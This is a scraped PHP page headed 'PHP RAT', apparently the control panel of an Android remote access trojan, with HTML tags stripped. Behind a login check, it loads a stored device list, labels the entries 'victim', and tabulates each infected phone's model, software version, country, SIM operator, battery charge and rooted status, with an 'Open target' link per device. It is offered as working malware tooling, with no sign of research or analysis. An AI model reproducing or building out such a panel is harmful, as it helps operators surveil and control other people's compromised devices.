?php require_once '../private/session_manager.php'; if(!isLogin()){ header('Location: login.php'); } ?> !DOCTYPE html> head> PHP RAT /head> body>





Device List hack
?php $strJsonFileContents = file_get_contents("../private/storage/device_list.json"); $victim_array = json_decode($strJsonFileContents, true); $index_victim = 1; foreach ($victim_array["device_list"] as $field => $value) { echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; echo ''; $index_victim += 1; } ?>
# DEVICE VERSION COUNTRY SIM SIM... CHARGE IS ROOTED ACTION
'.$index_victim.''.strtoupper($value['DEVICE_MODEL']).''.$value['SOFTWARE_VERSION'].''.$value['COUNTRY'].''.$value['SIM_OPERATOR'].''.$value['CHARGE'].''.$value['IS_ROOTED'].'Open target




Created by Update by SirBJS. © 2023-2024